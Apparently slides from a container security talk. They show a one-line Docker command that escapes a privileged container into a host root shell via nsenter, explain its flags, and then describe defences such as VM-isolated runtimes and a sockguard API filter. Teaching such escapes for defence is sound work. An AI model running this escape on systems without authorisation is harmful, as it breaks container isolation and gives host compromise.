Privileged Containers

Privileged Containers

Privileged containers have access to all syscalls

If able to start containers, just leave the isolation:

docker run -it \
--privileged \
--pid=host \
alpine \
nsenter -t 1 -m -u -n -i sh

Parameters of nsenter

• Work with namespaces (nsenter)
• Uses process tree of host (--pid=host)
• Get namespace from PID 1 (-t 1)
• Enter namespaces required for shell (-m -u -n -i)

–

Taming Privileges Containers

For example

Isolates containers in a lightweight VM

Configured as a container runtime (instead of runc)

–

Docker Engine API Filter

For example sockguard

• No privileged containers
• No host bind mounts
• No host network

/sockguard -upstream-socket /var/run/docker-raw.sock -filename /var/run/docker.sock